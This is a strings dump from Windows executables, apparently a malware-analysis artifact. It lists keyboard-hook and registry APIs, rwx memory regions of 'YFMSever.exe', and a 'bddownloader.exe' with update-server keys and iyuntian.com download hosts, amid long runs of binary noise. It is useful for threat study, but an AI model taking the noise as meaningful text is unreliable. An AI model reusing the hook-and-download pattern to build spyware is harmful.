K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-K<,K<,K<,K<,K<,K<,K<,K<,L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-M=-M=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/RA.RA.R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1SA0SA0SA0SA0SA0SA0SA0SA0R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/P@/P@/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/QB/QB/QB/QB/QB/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.PA.PA.

?6)?6)?6)?6)?6)?6)?6)?6)<6)?6(?6)

@6,>6)?6)

?7*=5(>6)@7*@4(?5 ?5

>5(>5(>5(>5(>5(>5(>5(>5(>5(>5'=5(>5'>6)@5'

;2(;2(;2(;2(;2(;2(;2(;2(;2(;2(;2(92)

<3)?4&=4'=4'=4&

:1':1':1':1':1':1':1':1';1'<2(;2(7/(

93(;2%;3&;2(

mf]<3%>3%SLCng^

|sP@/O@0M@2O@0N?/peWO@0O@0O@0O@0O@0OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/PA.MA/zqc

ZM?OA.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2SC3RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2RB1SC2RB1RB1QA0RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2TD3TD3TD3TD3TD3TD3TD3TD3TD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3UC2UC2UC2UC2UC2TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3WF3WF3WF3WF3WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5XI6XI6VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4YH5YH5XG4XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]J5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^L5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^I3^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3_K2`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3aM4aM4aM4aM4aM4aM4aM4aM4cM4cM4cM4cM4cM4

[email protected]@[email protected]?/[email protected]>.M>.YJ:

~J=/J=/J=/J=/J=/K>0J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L=-L=-L=-L=-L>,L>,L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/[email protected]@[email protected]@[email protected]@[email protected]/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2TE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XG4WF3WF3YE3XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1[F1]F0]F0

zui_E8*E8*E8*E8*E8*F9 E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,E:,E:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:*H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,J; J; J; J; J; J; J; J; J; J; J; J; J; J; J; K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,J; J; J; J; J; J; J; J; J; J; J; J; J; J; J; K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-K<,K<,K<,K<,K<,K<,K<,K<,L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-M=-M=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/RA.RA.R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1SA0SA0SA0SA0SA0SA0SA0SA0R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/P@/P@/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/QB/QB/QB/QB/QB/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.PA.PA.

=5(;4%=5(=4'<4':4)=4&

;2(:1':1'<2(:1';2(:0&<2(:1'

KWindows

eEWB.IEConst

0IdHTTPHeaderInfo

 IdTCPServer

IdTCPStream

Font.Charset

Font.Color

Font.Height

Font.Name

Font.Style

PrintOptions.HTMLHeader.Strings

PrintOptions.Orientation

ProxyParams.BasicAuthentication

ProxyParams.ProxyPort

Request.ContentLength

Request.ContentRangeEnd

Request.ContentRangeStart

Request.ContentType

Request.Accept

Request.BasicAuthentication

Request.UserAgent

7Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

HTTPOptions

GetCPInfo

XTP8h%C

3F%u`r

The procedure entry point %s could not be located in the dynamic link library %s

GetKeyNameTextA

GetKeyState

SHFileOperationA

UnhookWindowsHookEx

G({.NJ:

shell32.dll

Dadvapi32.dll

CreateIoCompletionPort

EnumWindows

RegCreateKeyExA

wininet.dll

gdi32.dll

RegEnumKeyExA

@8\3@(&@

m.KS!?IZ

.IjS0Z

4.Yz8

N.Px<

%F<W}

}H.wN

?.MLW

ShellExecuteA

SetViewportOrgEx

GetKeyboardState

LoadKeyboardLayoutA

GetWindowsDirectoryA

version.dll

RegDeleteKeyA

SetWindowsHookExA

RegCloseKey

|N.Uip

GetKeyboardType

.HX2'4

J['%Y%c%]"

 .Jz\

RP.Ji|

.VGZZQ?XD 9

bk.Zi7

6O.PJF>B&

.NV'Pg

E.PO*J

b?.RjB

).RJ$7

\.dfXX

HCtl.Lj

.VN&5

SRF98.XORO

<.cD:

~z%D&

jWyfTP

)N.QuHG`

vXp.aGB

.goU[

dS.IZf\6V

j.QU@'

C.XV$

tCP z

=H.Dt[

B3uDpZ

.Pv<^Y

.XD%O86

*?9[_'^-.

U^.bfD

Vj.eJd

&6%X"

%f z'W

T.cBe

@Z.CB

j.YW MYd

9.Dy7

5J{"WD%S#^

.ja*3

$.GE(X

"7b%D

\ @%X

..Ld?/o|S[

X.TJH

ôpQ

)%x5a

~M%x8u*

L.HJ7?

.ALh&

.DPs_

_.PPw

z'.ANC

nX.oF

L.JOS

..JG^

B.XG6

".LGR

G.Xfg

..VG8

.LG>S

D..GD

F.DOP

.ZO"R

.BO2R

^z.PG

5.TO RoZR

F.PdYXn

%fT@sd

.PdYX/

%fV@sd

=%X,7

<#.DGSTk^

FÝE

[.FGD

X.VO/

.JXZp

Q0.EL

.DO@U

3<6V.TO

.LF;F

.JGHU

.ZO4XxS

.uVX?

 >.GB

.GPF?J

<.MG=

InternetOpenUrlA

*o.eIv

EnumThreadWindows

user32.dll

RegQueryInfoKeyA

ActivateKeyboardLayout

MsgWaitForMultipleObjects

RegFlushKey

GetKeyboardLayoutList

The ordinal %u could not be located in the dynamic link library %s

DeleteUrlCacheEntry

iphlpapi.dll

GetKeyboardLayout

RegOpenKeyExA

MapVirtualKeyA

errorUrl

20.20.20.20

JPEG error #%d

Error creating SSL context. Could not load root certificate.

Could not load certificate.#Could not load key, check password.

SSL status: "%s"

Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.

Command not supported.

Address type not supported.$Error accepting connection with SSL.

Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.

Operation now in progress.

Operation already in progress.

Socket operation on non-socket.

Protocol not supported.

Socket type not supported."Operation not supported on socket.

Protocol family not supported.0Address family not supported by protocol family.

Chunk StartedDThis authentication method is already registered with class name %s.

%s is not a valid service.

Socket Error # %d

%s is not a valid IP address.

Operation would block.

File "%s" not found1Only one TIdAntiFreeze can exist per application."%d: Circular links are not allowed

No data to read.$Can not bind in port range (%d - %d)

Invalid Port Range (%d - %d)

Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)

Resolving hostname %s.

Connecting to %s.

.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters

OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s

Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.

No help keyword specified.

Alt  Clipboard does not support Icons

Cannot open clipboard/Menu '%s' is already being used by another form

No help found for %s#No context-sensitive help installed$No topic-based help system installed

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Thread creation error: %s

Thread Error: %s (%d)

Scan line index out of range!Cannot change the size of an icon Invalid operation on TOleGraphic

Unsupported clipboard format

$''%s'' is not a valid component name

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d) Out of memory while expanding memory stream

Error reading %s%s%s: %s

Failed to create key %s

Failed to get data for '%s'

Failed to set data for '%s'

Resource %s not found

Ancestor for '%s' not found

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file "%s". %s

Cannot open file "%s". %s

Unable to write to %s

Operation not supported

External exception %x

Interface not supported

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

Invalid variant operation%Invalid variant operation (%s%.8x)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Integer overflow Invalid floating point operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction(Exception %s in module %s at %p.

!'%s' is not a valid integer value('%s' is not a valid floating point value

'%s' is not a valid date

'%s' is not a valid time!'%s' is not a valid date and time

I/O error %d

YFMSever.exe_2388_rwx_00565000_00001000:

GetCPInfo

YFMSever.exe_2388_rwx_00578000_00002000:

kernel32.dll

GetKeyState

SHFileOperationA

UnhookWindowsHookEx

YFMSever.exe_2388_rwx_0057B000_00001000:

Dadvapi32.dll

CreateIoCompletionPort

EnumWindows

RegCreateKeyExA

wininet.dll

bddownloader.exe_2820:

.text

`.rdata

@.data

.rsrc

8%uvP

;*u.SUj

PSSSSSSh

>.uTV

j SSSSSSSh

aSSSh

FTPjK

FtPj;

C.PjRV

tGHt.Ht&

YYtCP

asio.ssl

asio.misc

D:\dl\boost_1_44_0_build\include\boost/exception/detail/exception_ptr.hpp

asio.misc error

asio.ssl error

dtrp.download.iyuntian.com

res.download.iyuntian.com

tk.download.iyuntian.com

utk.download.iyuntian.com

thread.exit_event

thread.entry_event

%s\Connection

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

VVV.baidu.com.cn

HTTP/1.1

$MD5Version: 1.0.0 November-19-1997 $

$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $

</%s>

<!--%s-->

standalone="%s"

encoding="%s"

version="%s"

&#xX;

%s='%s'

%s="%s"

PKEY_CUSTOMNAME

PKEY_PRODUCTNAME

PKEY_ISSHOW

PKEY_EXITTIME

PKEY_CUSTOMID

PKEY_START_STATUS

PKEY_GUID

PKEY_MINORVERSION

PKEY_MAJORVERSION

PKEY_COREVERSION

PKEY_EXEVERSION

PKEY_UPDATESERVERPORT

PKEY_UPDATESERVERIP

PKEY_PSHASH

PKEY_PSNAME

PKEY_EXHASH

PKEY_EXNAME

PKEY_TNHASH

PKEY_TNNAME

PKEY_COREHASH

PKEY_CORENAME

PKEY_EXEHASH

PKEY_EXENAME

PKEY_UPDATEURL

PKEY_FILENAME

PKEY_RESULT

up.download.iyuntian.com

PKEY_TTL

PKEY_ISFIX

PKEY_VERSION

PKEY_FILEEMULE_HASH

PKEY_FILEEMULE_SIZE

PKEY_FILEEMULE_NAME

PKEY_FILEBT_HASH

PKEY_FILEBT_SIZE

PKEY_FILEBT_NAME

PKEY_FILECORE_HASH

PKEY_FILECORE_SIZE

PKEY_FILECORE_NAME

PKEY_URL

PKEY_PERIOD

kernel32.dll

.mixcrt

KERNEL32.DLL

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

mscoree.dll

GetProcessWindowStation

USER32.DLL

operator

portuguese-brazilian

FhModule = %u, pfunc = %u

DbgHelp.dll

crash.dmp

0xX

DlBugReport.ini

DlBugReport.dat

%Y-%m-%d %H:%M:%S

%d.%d.%d.%d

,d-d-d d:d:d

[ 0xX ] %s [%s]

Error: Write address 0xX

Error: Read address 0xX

version = %s

%s-----------------------------------

Type: %s

Address: 0xX

bddownloader.exe

EXCEPTION_FLT_INVALID_OPERATION

EXCEPTION_FLT_DENORMAL_OPERAND

(%d,%d,%d,%d)

0xX<unknown module>:

%s::x;

0xX[%X] %s:

%s::x

Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag

Visual C   CRT: Not enough memory to complete call to strerror.

Broken pipe

Inappropriate I/O control operation

Operation not permitted

d:\dl\DownloadProxy_proj\Output\Release\bddownloader.pdb

GetProcessHeap

CreateIoCompletionPort

GetCPInfo

GetConsoleOutputCP

KERNEL32.dll

USER32.dll

GDI32.dll

RegDeleteKeyW

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

RegOpenKeyW

RegOpenKeyExA

ADVAPI32.dll

ShellExecuteW

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

COMCTL32.dll

WS2_32.dll

VERSION.dll

NetWkstaTransportEnum

NETAPI32.dll

PSAPI.DLL

imagehlp.dll

zcÁ

'DownloadProxy.EXE'

BDDownloadProxy.Downloader.1 = s 'Downloader Class'

CLSID = s '{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}'

BDDownloadProxy.Downloader = s 'Downloader Class'

CurVer = s 'BDDownloadProxy.Downloader.1'

ForceRemove {91B5E4DE-4C97-41CD-9F94-84BFAABB7371} = s 'Downloader Class'

ProgID = s 'BDDownloadProxy.Downloader.1'

VersionIndependentProgID = s 'BDDownloadProxy.Downloader'

'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'

stdole2.tlbWWW

cuiMsgTypeWWW

pMsgParamWWWd

6|pTaskUrl

Created by MIDL version 6.00.0366 at Thu Jan 02 17:35:38 2014

&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU

"7,,11,,7"

2222222222222222

11///20.

##!!! !!!##

.02///11

mM............................................................Mm

mM..........................................Mm

(((((((JgT..TgJ(((((((

ÿfH

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

